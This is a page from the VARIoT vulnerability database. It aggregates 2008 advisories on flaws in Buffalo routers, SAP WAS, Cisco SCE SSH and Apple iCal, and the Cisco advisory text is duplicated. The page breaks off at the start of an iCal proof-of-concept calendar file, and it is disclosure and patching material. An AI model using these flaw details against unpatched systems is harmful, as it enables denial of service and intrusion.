VARIoT IoT vulnerabilities database
| VAR-200805-0412 | No CVE | JP1/Cm2/Network Node Manager Denial of Service Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: Medium |
The JP1/Cm2/Network Node Manager (NNM) has vulnerability that can be exploited to cause a denial of service (DoS). A remote attacker could cause a denial of service (DoS).
| VAR-200805-0397 | No CVE | Buffalo router configuration management interface vulnerable to remote access and password leakage |
CVSS V2: 6.4 CVSS V3: - Severity: Medium |
Some Buffalo routers have a vulnerability that could allow remote access from the WAN side. A remote attacker could exploit this vulnerability to manipulate a router by gaining administrative privileges. By accessing the management interface, a remote attacker could also obtain user's account and password information of the ISP using the save settings function.Configurations could be changed by the remote attacker. As the save configuration stores user's account and password information of ISPs in plain-text format, a remote attacker could steal such information and impersonate a user to gain illegal access.
| VAR-200805-0065 | CVE-2008-2421 |
SAP WAS Such as Web GUI Vulnerable to cross-site scripting
Related entries in the VARIoT exploits database: VAR-E-200805-0249 |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the Web GUI in SAP Web Application Server (WAS) 7.0, Web Dynpro for ABAP (aka WD4A or WDA), and Web Dynpro for BSP allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI under bc/gui/sap/its/webgui/.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
SAP Web Application Server 7.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
Input passed via the URL to the sap/bc/gui/sap/its/webgui/ is not
properly sanitised before being returned to the user.
The vulnerability is reported in the SAP software components
SAP_BASIS 640, 700, 701, and 710.
SOLUTION:
A solution is available via SAP note 1136770.
PROVIDED AND/OR DISCOVERED BY:
Digital Security Research Group, dsec.ru
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200805-0002 | CVE-2008-0535 | Icon Labs SSH server vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the SSH server in (1) Cisco Service Control Engine (SCE) before 3.1.6, and (2) Icon Labs Iconfidant SSH before 2.3.8, allows remote attackers to cause a denial of service (device instability) via "SSH credentials that attempt to change the authentication method," aka Bug ID CSCsm14239. The most severe of these issues may allow an attacker to cause a vulnerable system to crash. Icon Labs Provided by Iconfidant SSH There are multiple vulnerabilities in the server. Icon Labs Provided by Iconfidant SSH Is an authentication protocol provided for embedded systems (SSH) is. Iconfidant SSH There are multiple vulnerabilities in the server.Service disruption from a remote third party (DoS) Under attack or server SSH May not be accepted. Cisco SCE (Service Control Engine) devices are prone to multiple denial-of-service vulnerabilities.
Attackers can leverage these issues to disrupt system stability or cause devices to reload. Successful exploits will deny service to legitimate users.
SCE devices running versions prior to SCOS (Service Control Operating System) 3.1.6 may be affected. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
SOLUTION:
Update to version 3.1.6.
http://www.cisco.com/pcgi-bin/tablebuild.pl/scos
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. The first vulnerability may be triggered during SSH login
activity that is conducted within aggressive time frames. The second
vulnerability may be triggered with normal SSH login activity in
combination with other SCE management actions occurring simultaneously.
The third vulnerability may be triggered during SSH login and is
specific to the usage of unique invalid authentication credentials.
Cisco has made free upgrade software available to address these
vulnerabilities for affected customers. There are no workarounds for
these vulnerabilities.
Note: These vulnerabilities are independent of each other; a device may
be affected by one vulnerability and not by the others.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml.
Note: The SCE SSH server is disabled by default. The following example
shows a Cisco SCE that runs software release 3.1.6:
SCE2000#>show version
System version: Version 3.1.6 Build 157
Build time: Mar 31 2008, 18:58:49 (Change-list 303626)
Software version is: Version 3.1.6 Build 157
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
Cisco SCE 1000 and 2000 series devices provide high-capacity advanced
application-level bandwidth optimization, stateful application
inspection, session-based classification and control of network
traffic. The SCE solution allows for the detection and control of
network applications including: web browsing, multimedia streaming, and
peer-to-peer (P2P).
This Security Advisory describes multiple distinct vulnerabilities.
These vulnerabilities are independent of each other.
* System vulnerability to SSH login activity
A vulnerability impacting the SCE SSH server may be triggered during SSH
login activity, resulting in system instability or a reload of the SCE.
Specific SSH processes may encounter temporary resource unavailability
if called within aggressive intervals.
This vulnerability is documented in Cisco Bug ID CSCsi68582 and has been
assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-0534.
* SSH login activity leads to illegal Input/Output operations
A second vulnerability exists in the SCE SSH server that may be
triggered with normal SSH traffic to the SCE management interface
occurring in conjunction with other management tasks. During this event,
an illegal IO operation may impact the SCE management agent, requiring a
reboot of the SCE to recover management access.
This vulnerability is documented in Cisco Bug ID CSCsh49563 and has been
assigned CVE ID CVE-2008-0536.
* SCE SSH authentication sequence anomaly
A third vulnerability exists in the SCE SSH server that may also be
triggered during the SSH login process but unrelated to login attempt
frequency or other concurrent management tasks. This issue is triggered
by the usage of specific SSH credentials that attempt to change the
authentication method, resulting in an authentication sequence anomaly
impacting system stability.
This vulnerability is documented in Cisco Bug ID CSCsm14239 and has been
assigned CVE ID CVE-2008-0535.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding VSS
at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html.
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss.
* System vulnerability to SSH login activity (CSCsi68582)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* SSH login activity leads to illegal I/O operations (CSCsh49563)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* SCE SSH authentication sequence anomaly (CSCsm14239)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of these vulnerabilities may result in the loss
of management access or, in some cases, cause vulnerable SCE devices to
reload.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
The following list contains the first fixed software release for each
vulnerability:
+---------------------------------------+
| | Affected | First |
| Vulnerability | Major | Fixed |
| | Release | Release |
|------------------+----------+---------|
| System | 1.x | 3.1.6 |
|vulnerability to |----------+---------|
| SSH login | 2.x | 3.1.6 |
|activity |----------+---------|
| | 3.x | 3.1.6 |
|------------------+----------+---------|
| | 1.x | 3.0.7 |
|SSH login |----------+---------|
| activity leads | 2.x | 3.0.7 |
|to illegal IO |----------+---------|
| operations | 3.x | 3.0.7, |
| | | 3.1.0 |
|------------------+----------+---------|
| | 1.x | 3.1.6 |
|SCE SSH |----------+---------|
| authentication | 2.x | 3.1.6 |
|sequence anomaly |----------+---------|
| | 3.x | 3.1.6 |
+---------------------------------------+
SCOS software version 3.1.6 contains the fixes for all vulnerabilities
described in this document.
SCOS software is available for download from the following location on
cisco.com:
http://www.cisco.com/pcgi-bin/tablebuild.pl/scos?psrtdcat20e2
Workarounds
===========
There are no workarounds for these vulnerabilities. Restricting
SCE SSH management interface access to only trusted devices through the
use of SCE ACLs or Transit ACLs is strongly recommended.
Additional information about SCE ACLs is available in the
"Configuring the Management Interface and Security" section of the
SCE Software Configuration Guide:
http://www.cisco.com/en/US/products/ps6134/products_configuration_guide_chapter09186a00808498b9.html#wp1060396
Additional information about tACLs is available in Transit Access
Control Lists: Filtering at Your Edge:
http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for software
upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such
as Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or fix
is the most appropriate for use in the intended network before it is
deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco service
contract, and customers who purchase through third-party vendors but are
unsuccessful in obtaining fixed software through their point of sale
should acquire upgrades by contacting the Cisco Technical Assistance
Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be requested
through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
The SSH login activity vulnerability was discovered during the
resolution of customer support cases.
The illegal Input/Output operation and authentication sequence anomaly
were discovered by Cisco during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml
In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2008-May-21 | Initial public release. |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2007-2008 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
Updated: May 21, 2008 Document ID: 100706
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFINE1U86n/Gc8U/uARAt0+AJ409BqcGWyfNNy1ZxGKj5m0IElUKwCdFCqC
iNU22mLg2pFDqnDyLstihPI=
=oKHO
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. flooding the vulnerable system with a large
amount of packets
| VAR-200805-0003 | CVE-2008-0536 | Icon Labs SSH server vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the SSH server in (1) Cisco Service Control Engine (SCE) 3.0.x before 3.0.7 and 3.1.x before 3.1.0, and (2) Icon Labs Iconfidant SSH before 2.3.8, allows remote attackers to cause a denial of service (management interface outage) via SSH traffic that occurs during management operations and triggers "illegal I/O operations," aka Bug ID CSCsh49563. The Icon Labs Iconfidant SSH server contails multiple vulnerabilities. The most severe of these issues may allow an attacker to cause a vulnerable system to crash. The problem is Bug IDs CSCsh49563 It is a problem.Management operations and fraud by third parties I/O Caused by operation SSH Service disruption through traffic (DoS) There is a possibility of being put into a state.
Attackers can leverage these issues to disrupt system stability or cause devices to reload. Successful exploits will deny service to legitimate users.
SCE devices running versions prior to SCOS (Service Control Operating System) 3.1.6 may be affected. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
Successful exploitation of these vulnerabilities requires that the
SSH server is enabled (not enabled by default).
SOLUTION:
Update to version 3.1.6.
http://www.cisco.com/pcgi-bin/tablebuild.pl/scos
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. The first vulnerability may be triggered during SSH login
activity that is conducted within aggressive time frames. The second
vulnerability may be triggered with normal SSH login activity in
combination with other SCE management actions occurring simultaneously.
The third vulnerability may be triggered during SSH login and is
specific to the usage of unique invalid authentication credentials.
Cisco has made free upgrade software available to address these
vulnerabilities for affected customers. There are no workarounds for
these vulnerabilities.
Note: These vulnerabilities are independent of each other; a device may
be affected by one vulnerability and not by the others.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml.
Note: The SCE SSH server is disabled by default. The following example
shows a Cisco SCE that runs software release 3.1.6:
SCE2000#>show version
System version: Version 3.1.6 Build 157
Build time: Mar 31 2008, 18:58:49 (Change-list 303626)
Software version is: Version 3.1.6 Build 157
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
Cisco SCE 1000 and 2000 series devices provide high-capacity advanced
application-level bandwidth optimization, stateful application
inspection, session-based classification and control of network
traffic. The SCE solution allows for the detection and control of
network applications including: web browsing, multimedia streaming, and
peer-to-peer (P2P).
This Security Advisory describes multiple distinct vulnerabilities.
These vulnerabilities are independent of each other.
Specific SSH processes may encounter temporary resource unavailability
if called within aggressive intervals.
This vulnerability is documented in Cisco Bug ID CSCsi68582 and has been
assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-0534. During this event,
an illegal IO operation may impact the SCE management agent, requiring a
reboot of the SCE to recover management access.
This vulnerability is documented in Cisco Bug ID CSCsh49563 and has been
assigned CVE ID CVE-2008-0536.
* SCE SSH authentication sequence anomaly
A third vulnerability exists in the SCE SSH server that may also be
triggered during the SSH login process but unrelated to login attempt
frequency or other concurrent management tasks. This issue is triggered
by the usage of specific SSH credentials that attempt to change the
authentication method, resulting in an authentication sequence anomaly
impacting system stability.
This vulnerability is documented in Cisco Bug ID CSCsm14239 and has been
assigned CVE ID CVE-2008-0535.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding VSS
at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html.
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss.
* System vulnerability to SSH login activity (CSCsi68582)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* SSH login activity leads to illegal I/O operations (CSCsh49563)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* SCE SSH authentication sequence anomaly (CSCsm14239)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of these vulnerabilities may result in the loss
of management access or, in some cases, cause vulnerable SCE devices to
reload.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
The following list contains the first fixed software release for each
vulnerability:
+---------------------------------------+
| | Affected | First |
| Vulnerability | Major | Fixed |
| | Release | Release |
|------------------+----------+---------|
| System | 1.x | 3.1.6 |
|vulnerability to |----------+---------|
| SSH login | 2.x | 3.1.6 |
|activity |----------+---------|
| | 3.x | 3.1.6 |
|------------------+----------+---------|
| | 1.x | 3.0.7 |
|SSH login |----------+---------|
| activity leads | 2.x | 3.0.7 |
|to illegal IO |----------+---------|
| operations | 3.x | 3.0.7, |
| | | 3.1.0 |
|------------------+----------+---------|
| | 1.x | 3.1.6 |
|SCE SSH |----------+---------|
| authentication | 2.x | 3.1.6 |
|sequence anomaly |----------+---------|
| | 3.x | 3.1.6 |
+---------------------------------------+
SCOS software version 3.1.6 contains the fixes for all vulnerabilities
described in this document.
SCOS software is available for download from the following location on
cisco.com:
http://www.cisco.com/pcgi-bin/tablebuild.pl/scos?psrtdcat20e2
Workarounds
===========
There are no workarounds for these vulnerabilities. Restricting
SCE SSH management interface access to only trusted devices through the
use of SCE ACLs or Transit ACLs is strongly recommended.
Additional information about SCE ACLs is available in the
"Configuring the Management Interface and Security" section of the
SCE Software Configuration Guide:
http://www.cisco.com/en/US/products/ps6134/products_configuration_guide_chapter09186a00808498b9.html#wp1060396
Additional information about tACLs is available in Transit Access
Control Lists: Filtering at Your Edge:
http://www.cisco.com/en/US/tech/tk648/tk361/technologies_white_paper09186a00801afc76.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for software
upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such
as Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or fix
is the most appropriate for use in the intended network before it is
deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco service
contract, and customers who purchase through third-party vendors but are
unsuccessful in obtaining fixed software through their point of sale
should acquire upgrades by contacting the Cisco Technical Assistance
Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be requested
through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
The SSH login activity vulnerability was discovered during the
resolution of customer support cases.
The illegal Input/Output operation and authentication sequence anomaly
were discovered by Cisco during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080521-sce.shtml
In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2008-May-21 | Initial public release. |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities
in Cisco products, obtaining assistance with security
incidents, and registering to receive security information
from Cisco, is available on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding
Cisco security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2007-2008 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
Updated: May 21, 2008 Document ID: 100706
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFINE1U86n/Gc8U/uARAt0+AJ409BqcGWyfNNy1ZxGKj5m0IElUKwCdFCqC
iNU22mLg2pFDqnDyLstihPI=
=oKHO
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. flooding the vulnerable system with a large
amount of packets
| VAR-200805-0134 | CVE-2008-2006 | Apple iCal 'TRIGGER' Parameter Denial of Service Vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Apple iCal 3.0.1 on Mac OS X allows remote CalDAV servers, and user-assisted remote attackers, to cause a denial of service (NULL pointer dereference and application crash) or possibly execute arbitrary code via a .ics file containing (1) a large 16-bit integer on a TRIGGER line, or (2) a large integer in a COUNT field on an RRULE line. (1) TRIGGER Excessively large of lines 16 Bit integer (2) RRULE In line COUNT Overly large integer in field. Apple iCal is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
This issue affects iCal 3.0.1 running on Mac OS X 10.5.1; previous versions may also be affected. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Multiple vulnerabilities in iCal
*Advisory Information*
Title: Multiple vulnerabilities in iCal
Advisory ID: CORE-2008-0126
Advisory URL: http://www.coresecurity.com/?action=item&id=2219
Date published: 2008-05-21
Date of last update: 2008-05-21
Vendors contacted: Apple Inc.
Release mode: Coordinated release
*Vulnerability Information*
Class: Input Validation
Remotely Exploitable: Yes (client-side)
Locally Exploitable: No
Bugtraq ID: 28629 28632 28633
CVE Name: CVE-2008-1035 CVE-2008-2006 CVE-2008-2007
*Vulnerability Description*
iCal is a personal calendar application from Apple Inc. included on the
Mac OS X operating system. The calendar application can be used as a
stand-alone application or as a client-side component to calendar server
that lets users create and share multiple calendars and subscribe to
other user's calendars. Apple's iCal uses the iCalendar standard for its
calendar file format (which uses the '.ics' filename extension) [1] and
the CalDAV protocol for calendar sharing [2]. There is a growing number
of web sites providing calendars files and open subscription to calendar
updates [3][4][5].
The most serious of the three vulnerabilities is due to potential
memory corruption resulting from a resource liberation bug that can be
triggered with a malformed '.ics' calendar file specially crafted by a
would-be attacker.
Exploitation of these vulnerabilities in a client-side attack scenario
is possible with user assistance by opening or clicking on specially
crafted '.ics' file send over email or hosted on a malicious web server;
or without direct user assistance if a would-be attacker has the ability
to legitimately add or modify calendar files on a CalDAV server.
*Vulnerable Packages*
. iCal version 3.0.1 on MacOS X 10.5.1 (Leopard).
*Non-vulnerable Packages*
. Available through Apple security updates (see vendor information below).
*Vendor Information, Solutions and Workarounds*
The following information was provided by the vendor:
Availability
Apple security updates are available via the Software Update mechanism:
http://support.apple.com/kb/HT1338
Apple security updates are also available for manual download via:
http://www.apple.com/support/downloads/
Cross-References
If you provide cross-referencing information in your advisory please
link to the following URL: http://support.apple.com/kb/HT1222
*Credits*
These vulnerabilities were discovered and researched by Rodrigo
Carvalho, from the Core Security Consulting Services (SCS) team of Core
Security Technologies during Bugweek 2007. Additional research was done
by Ricardo Narvaja from CORE IMPACT the Exploit Writers Team (EWT).
A client-side attack directed to the end-users of the iCal application
can be executed by sending an email with a malicious .ics file
attachment, by hosting a malicious .ics file on web site and directing
users to open it or by injecting a malicous .ics file on a CalDAV
enabled server to which potential victims are subscribed to update their
calendars automatically. In the three reported cases the vulnerabilities
arise from improper validation of input while or after parsing of the
calendar file format.
The following Proof of Concept (PoC) file is provided to demonstrate
its feasibility, to trigger the bug import a .ics file with the
following content and then select one of the created events.
/-----------
BEGIN:VCALENDAR
X-WR-TIMEZONE:America/Buenos_Aires
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
X-WR-CALNAME: Vulnerable
VERSION:2.0
